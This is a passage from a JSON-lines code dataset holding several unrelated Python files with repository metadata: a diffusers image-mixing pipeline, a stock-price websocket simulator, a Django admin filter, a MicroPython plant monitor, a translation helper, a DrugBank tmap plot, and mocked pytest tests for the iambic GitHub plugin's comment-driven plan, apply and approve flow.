cross_attention_kwargs: Optional[Dict[str, Any]] = None,\n k_min: float = 0.3, # float between 0 and 1, k_max to k_min is the mixing of the two semantics\n k_max: float = 0.6, # float between 0 and 1, k_min < k_max, iterations to get layout of the image\n v: float = 0.5, # float between 0 and 1, mix factor\n ):\n # 1. Check inputs. Raise error if not correct\n self.check_inputs(\n prompt,\n 1.0,\n callback_steps,\n negative_prompt,\n prompt_embeds,\n negative_prompt_embeds,\n )\n\n # 2. Define call parameters\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n device = self._execution_device\n # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)\n # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`\n # corresponds to doing no classifier free guidance.\n if guidance_scale is not None and guidance_scale > 1.0:\n do_classifier_free_guidance = True\n else:\n do_classifier_free_guidance = False\n\n # 3. Encode input prompt\n text_encoder_lora_scale = (\n cross_attention_kwargs.get(\"scale\", None)\n if cross_attention_kwargs is not None\n else None\n )\n prompt_embeds = self._encode_prompt(\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt,\n prompt_embeds=prompt_embeds,\n negative_prompt_embeds=negative_prompt_embeds,\n lora_scale=text_encoder_lora_scale,\n )\n\n # 4. Preprocess image\n image = self.image_processor.preprocess(image)\n\n # 5. set timesteps\n self.scheduler.set_timesteps(num_inference_steps, device=device)\n timesteps, num_inference_steps = self.get_timesteps(\n num_inference_steps, k_max, device\n )\n latent_timestep = timesteps[:1].repeat(batch_size * num_images_per_prompt) # type: ignore\n mixing_step_till = num_inference_steps - int(num_inference_steps * k_min) # type: ignore\n\n # 6. Prepare latent variables\n latents, image_latents, init_noise = self.prepare_latents(\n image,\n latent_timestep,\n batch_size,\n num_images_per_prompt,\n prompt_embeds.dtype,\n device,\n generator,\n )\n\n # 7. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline\n extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)\n\n # 8. Denoising loop\n num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order\n with self.progress_bar(total=num_inference_steps) as progress_bar:\n for i, t in enumerate(timesteps):\n if i < mixing_step_till and t != timesteps[0]:\n layout_latents = self.scheduler.add_noise(\n image_latents, init_noise, t\n )\n\n # Mix the layout latents and current latents based on mixing ratio\n combined_latents = (v * latents) + ((1 - v) * layout_latents)\n else:\n combined_latents = latents\n\n # expand the latents if we are doing classifier free guidance\n latent_model_input = (\n torch.cat([combined_latents] * 2)\n if do_classifier_free_guidance\n else combined_latents\n )\n latent_model_input = self.scheduler.scale_model_input(\n latent_model_input, t\n )\n\n # predict the noise residual\n noise_pred = self.unet(\n latent_model_input,\n t,\n encoder_hidden_states=prompt_embeds,\n cross_attention_kwargs=cross_attention_kwargs,\n return_dict=False,\n )[0]\n\n # perform guidance\n if do_classifier_free_guidance:\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + guidance_scale * (\n noise_pred_text - noise_pred_uncond\n )\n\n # compute the previous noisy sample x_t -> x_t-1\n latents = self.scheduler.step(\n noise_pred, t, latents, **extra_step_kwargs, return_dict=False\n )[0]\n\n # call the callback, if provided\n if i == len(timesteps) - 1 or (\n (i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0\n ):\n progress_bar.update()\n if callback is not None and i % callback_steps == 0:\n callback(i, t, latents)\n\n if not output_type == \"latent\":\n image = self.vae.decode(\n latents / self.vae.config.scaling_factor, return_dict=False\n )[0]\n image, has_nsfw_concept = self.run_safety_checker(\n image, device, prompt_embeds.dtype\n )\n else:\n image = latents\n has_nsfw_concept = None\n\n if has_nsfw_concept is None:\n do_denormalize = [True] * image.shape[0]\n else:\n do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept]\n\n image = self.image_processor.postprocess(\n image, output_type=output_type, do_denormalize=do_denormalize\n )\n\n # Offload last model to CPU\n if hasattr(self, \"final_offload_hook\") and self.final_offload_hook is not None:\n self.final_offload_hook.offload()\n\n if not return_dict:\n return (image, has_nsfw_concept)\n\n return StableDiffusionPipelineOutput(\n images=image, nsfw_content_detected=has_nsfw_concept\n )\n","repo_name":"nipunjindal/diffusers-magic-mix","sub_path":"magicmix/magic_mix_pipeline_img2img.py","file_name":"magic_mix_pipeline_img2img.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20356864772","text":"import asyncio\nimport websockets\n\nimport random\nimport requests\n\n\nasync def send_price_update():\n URI = 'ws://localhost:8765'\n\n async with websockets.connect(uri=URI) as websocket:\n while True: \n sim_price = 25 + random.uniform(-5, 5)\n PUT_sim_price = f'{sim_price:.2f}'\n try:\n requests.put(\"http://127.0.0.1:5000/stock\", \n json= {\n \"ticker\": \"NMRT\",\n \"price\": float(PUT_sim_price)\n })\n print('Connected, The price for the stock \"NMRT\" has changed!')\n except Exception as e:\n print(f'Error making the put request! {e}')\n\n await websocket.send(f'-UPDATE- the price for the stock \"NMRT\" is now: {sim_price:.2f}')\n\n await asyncio.sleep(5)\n\nasyncio.get_event_loop().run_until_complete(send_price_update())","repo_name":"Abdo-Mos/Stock_Market_Sim_REST_GraphQL_WebSocket","sub_path":"price_sim.py","file_name":"price_sim.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40403831612","text":"from django.contrib import admin\nfrom django.db.models import Q\n\n\nclass IsEmptyMatchFilter(admin.SimpleListFilter):\n \"\"\"Empty Match Filter\"\"\"\n\n title = 'Есть совпадения'\n parameter_name = 'is_empty_match'\n\n def lookups(self, request, model_admin):\n \"\"\"Get lookups\"\"\"\n return (\n ('', '-'),\n ('yes', 'Да'),\n ('no', 'Нет'),\n )\n\n def queryset(self, request, queryset):\n \"\"\"Get queryset\"\"\"\n value = self.value()\n if value == 'yes':\n return queryset.filter(overclockerskz__isnull=False, shopkz__isnull=False)\n elif value == 'no':\n return queryset.filter(Q(overclockerskz__isnull=True) | Q(shopkz__isnull=True))\n return queryset\n","repo_name":"4heck/overclockers-price-monitoring","sub_path":"apps/match/admin/filters/is_empty_match.py","file_name":"is_empty_match.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"18694353311","text":"from PlantMonitor.helper_functions import get_colour, get_neopixel_number\nfrom PlantMonitor.pixels import update_neopixels\nfrom PlantMonitor.webpages import setup_tinyweb_soil_moisture\nfrom helper_functions.io import load_json_settings\nfrom helper_functions.soil_moisture import get_soil_moisture\nfrom helper_functions.temperature import get_temperature\nfrom helper_functions.wifi_connection import connect_wifi, setup_access_point, \\\n setup_tinyweb_wifi\nimport network\nimport uasyncio\nimport machine\nimport neopixel\n\n\nwifi_config_file = 'configs/wireless_network.json'\nplant_config_file = 'PlantMonitor/config.json'\nneopixel_number = 10\nconnect_wifi(2, wifi_config_file)\n\n\nimport tinyweb\n\n# Setup the neopixel strip\nnp = neopixel.NeoPixel(machine.Pin(5), neopixel_number)\n\n\n# setup own wifi network if not connected\nsta_if = network.WLAN(network.STA_IF)\nif not sta_if.isconnected():\n setup_access_point(wifi_config_file)\n\n# Setup the tinyweb app\nwebserver = tinyweb.server.webserver()\n# Add the update wifi settings to the app\nsetup_tinyweb_wifi(webserver, wifi_config_file)\n\n# Setup the webpages to update the config of the soil sensor\nsetup_tinyweb_soil_moisture(webserver, plant_config_file)\n\n\n# define the main loop of the application\nasync def my_app():\n while True:\n plant_config = load_json_settings(plant_config_file)\n adc_raw, soil_moisture_perc = get_soil_moisture(\n **plant_config['soil_moisture_calibration']) # get SMD\n number = get_neopixel_number(soil_moisture_perc, neopixel_number,\n **plant_config['soil_moisture'])\n if number > neopixel_number:\n colour = (200, 0, 200)\n number = neopixel_number\n else:\n temp = get_temperature()\n colour = get_colour(temp, **plant_config['temperature']) # calculate colour\n update_neopixels(neopixel_number, number, colour, np)\n await uasyncio.sleep(60)\n\nwebserver.loop.create_task(my_app())\n\nprint('loaded')\n\n# Run the app\nwebserver.run(host='0.0.0.0', port=80)\n","repo_name":"EchoDel/hardware_projects","sub_path":"PlantMonitor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21486680841","text":"import json, requests\n\nkey = json.loads(open('cfg.txt', 'r').read())['yandex']\ncfg = json.loads(open('answers.txt', 'r').read())\nlangs = ['en', 'it', 'fr', 'de', 'uk', 'pl']\nformat = 'https://translate.yandex.net/api/v1.5/tr.json/translate?key={key}&text={text}&lang={lang}&format=plain'\n\nwhile 1:\n try:\n name = input('name: ')\n val = input('value: ') + '\\n'\n while 1:\n inp = input()\n if inp.find('EOF') != -1:\n val += inp.replace('EOF','')\n break\n val += inp + '\\n'\n cfg[name] = {}\n cfg[name]['ru'] = val\n for lang in langs:\n print(f'rquesting {lang}:')\n answer = json.loads(requests.get(format.format(lang=lang,text=val,key=key)).text)['text'][0]\n cfg[name][lang] = answer\n print(answer)\n f = open('answers.txt', 'w')\n f.write(json.dumps(cfg))\n f.close()\n except:\n print('exit')\n break\n","repo_name":"Denver-sn/SecurePass-TG","sub_path":"add_new_answer.py","file_name":"add_new_answer.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69943722482","text":"import numpy as np\nimport pandas as pd\nimport tmap as tm\nimport scipy.stats as ss\nfrom faerun import Faerun\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom mhfp.encoder import MHFPEncoder\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom lipinski import lipinski_pass\n\n\ndef main():\n \"\"\"The main function\"\"\"\n df = pd.read_csv(\"drugbank.csv\").dropna(subset=[\"SMILES\"]).reset_index(drop=True)\n enc = MHFPEncoder()\n lf = tm.LSHForest(2048, 128)\n\n fps = []\n labels = []\n groups = []\n tpsa = []\n logp = []\n mw = []\n h_acceptors = []\n h_donors = []\n ring_count = []\n is_lipinski = []\n has_coc = []\n has_sa = []\n has_tz = []\n\n substruct_coc = AllChem.MolFromSmiles(\"COC\")\n substruct_sa = AllChem.MolFromSmiles(\"NS(=O)=O\")\n substruct_tz = AllChem.MolFromSmiles(\"N1N=NN=C1\")\n\n total = len(df)\n for i, row in df.iterrows():\n if i % 1000 == 0 and i > 0:\n print(f\"{round(100 * (i / total))}% done ...\")\n\n smiles = row[6]\n mol = AllChem.MolFromSmiles(smiles)\n\n if mol and mol.GetNumAtoms() > 5 and smiles.count(\".\") < 2:\n fps.append(tm.VectorUint(enc.encode_mol(mol, min_radius=0)))\n labels.append(\n f'{smiles}__{row[0]}__{row[1]}'.replace(\n \"'\", \"\"\n )\n )\n groups.append(row[3].split(\";\")[0])\n tpsa.append(Descriptors.TPSA(mol))\n logp.append(Descriptors.MolLogP(mol))\n mw.append(Descriptors.MolWt(mol))\n h_acceptors.append(Descriptors.NumHAcceptors(mol))\n h_donors.append(Descriptors.NumHDonors(mol))\n ring_count.append(Descriptors.RingCount(mol))\n is_lipinski.append(lipinski_pass(mol))\n has_coc.append(mol.HasSubstructMatch(substruct_coc))\n has_sa.append(mol.HasSubstructMatch(substruct_sa))\n has_tz.append(mol.HasSubstructMatch(substruct_tz))\n\n # Create the labels and the integer encoded array for the groups,\n # as they're categorical\n labels_groups, groups = Faerun.create_categories(groups)\n tpsa_ranked = ss.rankdata(np.array(tpsa) / max(tpsa)) / len(tpsa)\n logp_ranked = ss.rankdata(np.array(logp) / max(logp)) / len(logp)\n mw_ranked = ss.rankdata(np.array(mw) / max(mw)) / len(mw)\n h_acceptors_ranked = ss.rankdata(np.array(h_acceptors) / max(h_acceptors)) / len(\n h_acceptors\n )\n h_donors_ranked = ss.rankdata(np.array(h_donors) / max(h_donors)) / len(h_donors)\n ring_count_ranked = ss.rankdata(np.array(ring_count) / max(ring_count)) / len(\n ring_count\n )\n\n lf.batch_add(fps)\n lf.index()\n cfg = tm.LayoutConfiguration()\n cfg.k = 100\n # cfg.sl_extra_scaling_steps = 1\n cfg.sl_repeats = 2\n cfg.mmm_repeats = 2\n cfg.node_size = 2\n x, y, s, t, _ = tm.layout_from_lsh_forest(lf, config=cfg)\n\n # Define a colormap highlighting approved vs non-approved\n custom_cmap = ListedColormap(\n [\"#2ecc71\", \"#9b59b6\", \"#ecf0f1\", \"#e74c3c\", \"#e67e22\", \"#f1c40f\", \"#95a5a6\"],\n name=\"custom\",\n )\n\n bin_cmap = ListedColormap([\"#e74c3c\", \"#2ecc71\"], name=\"bin_cmap\")\n\n f = Faerun(\n clear_color=\"#222222\",\n coords=False,\n view=\"front\",\n impress='made with tmap
    and faerun
    source',\n )\n\n f.add_scatter(\n \"Drugbank\",\n {\n \"x\": x,\n \"y\": y,\n \"c\": [\n groups,\n is_lipinski,\n has_coc,\n has_sa,\n has_tz,\n tpsa_ranked,\n logp_ranked,\n mw_ranked,\n h_acceptors_ranked,\n h_donors_ranked,\n ring_count_ranked,\n ],\n \"labels\": labels,\n },\n shader=\"smoothCircle\",\n colormap=[\n custom_cmap,\n bin_cmap,\n bin_cmap,\n bin_cmap,\n bin_cmap,\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n ],\n point_scale=2.5,\n categorical=[True, True, True, True, True, False, False, False, False, False],\n has_legend=True,\n legend_labels=[\n labels_groups,\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n ],\n selected_labels=[\"SMILES\", \"Drugbank ID\", \"Name\"],\n series_title=[\n \"Group\",\n \"Lipinski\",\n \"Ethers\",\n \"Sulfonamides\",\n \"Tetrazoles\",\n \"TPSA\",\n \"logP\",\n \"Mol Weight\",\n \"H Acceptors\",\n \"H Donors\",\n \"Ring Count\",\n ],\n max_legend_label=[\n None,\n None,\n None,\n None,\n None,\n str(round(max(tpsa))),\n str(round(max(logp))),\n str(round(max(mw))),\n str(round(max(h_acceptors))),\n str(round(max(h_donors))),\n str(round(max(ring_count))),\n ],\n min_legend_label=[\n None,\n None,\n None,\n None,\n None,\n str(round(min(tpsa))),\n str(round(min(logp))),\n str(round(min(mw))),\n str(round(min(h_acceptors))),\n str(round(min(h_donors))),\n str(round(min(ring_count))),\n ],\n title_index=2,\n legend_title=\"\",\n )\n\n f.add_tree(\"drugbanktree\", {\"from\": s, \"to\": t}, point_helper=\"Drugbank\")\n\n f.plot(\"drugbank\", template=\"smiles\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"reymond-group/tmap","sub_path":"examples/drugbank/drugbank.py","file_name":"drugbank.py","file_ext":"py","file_size_in_byte":6058,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"75"} +{"seq_id":"41025608898","text":"from __future__ import annotations\n\nimport json\nimport shutil\nimport tempfile\nfrom unittest import mock\nfrom unittest.mock import AsyncMock, MagicMock, PropertyMock, call, patch\n\nimport github\nimport pytest\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ec\n\nfrom iambic.core.utils import jws_encode_with_past_time\nfrom iambic.plugins.v0_1_0.github.github import (\n BODY_MAX_LENGTH,\n MERGEABLE_STATE_BLOCKED,\n MERGEABLE_STATE_CLEAN,\n HandleIssueCommentReturnCode,\n _post_artifact_to_companion_repository,\n ensure_body_length_fits_github_spec,\n format_github_url,\n get_session_name,\n handle_issue_comment,\n handle_pull_request,\n maybe_merge,\n)\nfrom iambic.plugins.v0_1_0.github.iambic_plugin import GithubBotApprover\n\n\n@pytest.fixture\ndef mock_github_client():\n with patch(\"github.Github\", autospec=True) as mock_github:\n yield mock_github\n\n\n@pytest.fixture\ndef issue_comment_git_apply_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n \"user\": {\n \"login\": \"faker-user\",\n },\n }\n\n\n@pytest.fixture\ndef issue_comment_git_plan_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-plan\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n }\n\n\n@pytest.fixture\ndef issue_comment_git_approve_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic approve\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n }\n\n\n@pytest.fixture\ndef mock_lambda_run_handler():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.lambda_run_handler\", autospec=True\n ) as _mock_lambda_run_handler:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_lambda_run_handler\n\n\n@pytest.fixture\ndef mock_resolve_config_template_path():\n async_mock = AsyncMock()\n with patch(\n \"iambic.plugins.v0_1_0.github.github.resolve_config_template_path\",\n side_effect=async_mock,\n ) as _mock_resolve_config_template_path:\n yield _mock_resolve_config_template_path\n\n\n@pytest.fixture\ndef mock_load_config():\n async_mock = AsyncMock()\n with patch(\n \"iambic.plugins.v0_1_0.github.github.load_config\", side_effect=async_mock\n ) as _load_config:\n async_mock.return_value.github.allowed_bot_approvers = [\n GithubBotApprover(login=\"fake-commenter\", es256_pub_key=\"\")\n ]\n yield _load_config\n\n\n@pytest.fixture\ndef mock_run_git_plan():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.run_git_plan\", autospec=True\n ) as _mock_run_git_plan:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_run_git_plan\n\n\n@pytest.fixture\ndef mock_run_git_apply():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.run_git_apply\", autospec=True\n ) as _mock_run_git_plan:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_run_git_plan\n\n\n@pytest.fixture\ndef mock_lint_git_changes():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.lint_git_changes\", autospec=True\n ) as _mock_lint_git_changes:\n yield _mock_lint_git_changes\n\n\n@pytest.fixture\ndef mock_commits():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.prepare_local_repo_for_new_commits\",\n autospec=True,\n ) as _mock_commits:\n yield _mock_commits\n\n\n@pytest.fixture\ndef mock_repository():\n with patch(\"iambic.core.git.Repo\", autospec=True) as _mock_repository:\n yield _mock_repository\n\n\ndef test_issue_comment_with_non_clean_mergeable_state(\n mock_github_client, issue_comment_git_apply_context, mock_lambda_run_handler\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_BLOCKED\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_lambda_run_handler.called is False\n assert mock_pull_request.merge.called is False\n\n\ndef test_issue_comment_with_not_applicable_comment_body(\n mock_github_client, issue_comment_git_apply_context, mock_lambda_run_handler\n):\n issue_comment_git_apply_context[\"event\"][\"comment\"][\"body\"] = \"foo\"\n return_code = handle_issue_comment(\n mock_github_client, issue_comment_git_apply_context\n )\n assert return_code == HandleIssueCommentReturnCode.NO_MATCHING_BODY\n\n\ndef test_issue_comment_with_clean_mergeable_state(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_run_git_apply.return_value = []\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_apply_context[\"sha\"]\n )\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n assert mock_pull_request.merge.called\n\n\n# invariant: PR is only merged if and only if git-apply is successful\ndef test_issue_comment_with_clean_mergeable_state_and_lambda_handler_crashed(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_apply_context[\"sha\"]\n )\n mock_run_git_apply.side_effect = Exception(\"unexpected failure\")\n with pytest.raises(Exception):\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n assert mock_pull_request.create_issue_comment.called\n assert \"Traceback\" in mock_pull_request.create_issue_comment.call_args[0][0]\n assert not mock_pull_request.merge.called\n\n\n# invariant: PR is only merged if and only if git-apply is successful\ndef test_plan_issue_comment_with_clean_mergeable_state_and_lambda_handler_crashed(\n mock_github_client,\n issue_comment_git_plan_context,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_lint_git_changes,\n mock_run_git_plan,\n mock_repository,\n):\n assert mock_load_config\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_plan_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_plan_context[\"sha\"]\n )\n mock_run_git_plan.side_effect = Exception(\"unexpected failure\")\n with pytest.raises(Exception):\n handle_issue_comment(mock_github_client, issue_comment_git_plan_context)\n assert mock_resolve_config_template_path.called\n assert mock_lint_git_changes.called\n assert mock_run_git_plan.called\n assert mock_pull_request.create_issue_comment.called\n assert \"Traceback\" in mock_pull_request.create_issue_comment.call_args[0][0]\n assert not mock_pull_request.merge.called\n\n\ndef test_format_github_url():\n pr_url = \"https://github.com/example-org/iambic-templates.git\"\n fake_token = \"foobar\"\n expected_url = \"https://oauth2:foobar@github.com/example-org/iambic-templates.git\"\n url = format_github_url(pr_url, fake_token)\n assert url == expected_url\n\n\n@pytest.fixture\ndef pull_request_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"pull_request\",\n \"event\": {\n \"pull_request\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n \"iambic\": {\n \"GH_OVERRIDE_TOKEN\": \"fake_override_token\",\n },\n }\n\n\ndef test_pull_request_plan(\n mock_github_client, pull_request_context, mock_run_git_plan, mock_repository\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.head.sha = pull_request_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = pull_request_context[\n \"sha\"\n ]\n handle_pull_request(mock_github_client, pull_request_context)\n assert (\n mock_run_git_plan.called is False\n ) # because this flow only directly calls create_issue_comment on the pull request\n assert (\n not mock_pull_request.merge.called\n ) # because this flow only issue the comment\n\n\n@pytest.mark.parametrize(\n \"repo_name,pr_number,expected_result\",\n [\n (\n \"noqdev/iambic-templates-itest\",\n \"1\",\n \"org=noqdev,repo=iambic-templates-itest,pr=1\",\n ),\n (\"noqdev/a^b\", \"1\", \"org=noqdev,repo=ab,pr=1\"),\n ],\n)\ndef test_get_session_name(repo_name, pr_number, expected_result):\n session_name = get_session_name(repo_name, pr_number)\n assert session_name == expected_result\n\n\ndef test_issue_comment_with_git_plan(\n mock_github_client,\n issue_comment_git_plan_context,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_lint_git_changes,\n mock_run_git_plan,\n mock_repository,\n):\n assert mock_load_config\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_plan_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_plan_context[\"sha\"]\n )\n handle_issue_comment(mock_github_client, issue_comment_git_plan_context)\n assert mock_resolve_config_template_path.called\n assert mock_lint_git_changes.called\n assert mock_run_git_plan.called\n assert not mock_pull_request.merge.called\n\n\ndef test_issue_comment_with_allowed_approver(\n mock_github_client,\n issue_comment_git_approve_context,\n mock_repository,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_commits,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n assert mock_repository\n assert mock_resolve_config_template_path\n assert mock_load_config\n assert mock_commits\n\n approver: GithubBotApprover = (\n mock_load_config.side_effect.return_value.github.allowed_bot_approvers[0]\n )\n\n # Generate a new ECDSA private key\n private_key = ec.generate_private_key(\n ec.SECP256R1()\n ) # This is equivalent to the ES256 algorithm\n public_key = private_key.public_key()\n\n # Convert keys to PEM format\n private_pem = private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption(),\n )\n assert private_pem\n public_pem = public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n assert public_pem\n\n approver.es256_pub_key = public_pem.decode(\"utf-8\")\n payload = {\n \"repo\": \"example.com/iambic-templates\",\n \"pr\": 1,\n \"signee\": [\n \"user1@example.org\",\n \"user2@example.org\",\n ],\n }\n algorithm = \"ES256\"\n valid_period_in_minutes = 15\n encoded_jwt = jws_encode_with_past_time(\n payload, private_pem, algorithm, valid_period_in_minutes\n )\n\n # message format for approve\n # iambic approve\\n\n # \\n\n # \n # remember last line cannot have any newline character, the signature metadata must be on the last line\n\n message = f\"\"\"iambic approve\n```json\n{json.dumps(payload)}\n```\n\"\"\"\n issue_comment_git_approve_context[\"event\"][\"comment\"][\"body\"] = message\n\n handle_issue_comment(mock_github_client, issue_comment_git_approve_context)\n assert mock_pull_request.create_review.called is True\n\n\ndef test_issue_comment_with_not_allowed_approver(\n mock_github_client,\n issue_comment_git_approve_context,\n mock_repository,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_commits,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n assert mock_commits\n assert mock_repository\n assert mock_resolve_config_template_path\n assert mock_load_config\n mock_load_config.side_effect.return_value.github.allowed_bot_approvers = []\n handle_issue_comment(mock_github_client, issue_comment_git_approve_context)\n assert mock_pull_request.create_review.called is False\n\n\n# verify if there are changes during git_apply. those changes are push\n# back into the PR\ndef test_issue_comment_with_clean_mergeable_state_with_additional_commits(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_pull_request.head.ref = issue_comment_git_apply_context[\"ref\"]\n pre_sha = \"pre_sha\"\n post_sha = \"post_sha\"\n\n # we are mocking how the sha has changed in the local checkout repo\n type(mock_repository.clone_from.return_value.head.commit).hexsha = PropertyMock(\n side_effect=[\n pre_sha,\n post_sha,\n ]\n )\n\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n\n # verify we did push back the changes to remote\n pull_request_branch_name = mock_pull_request.head.ref\n refspec = f\"HEAD:{pull_request_branch_name}\"\n mock_repository.clone_from.return_value.remotes.origin.push.assert_called_with(\n refspec=refspec\n )\n\n # verify we are merging with the latest local repo sha\n mock_pull_request.merge.assert_called_with(sha=post_sha, 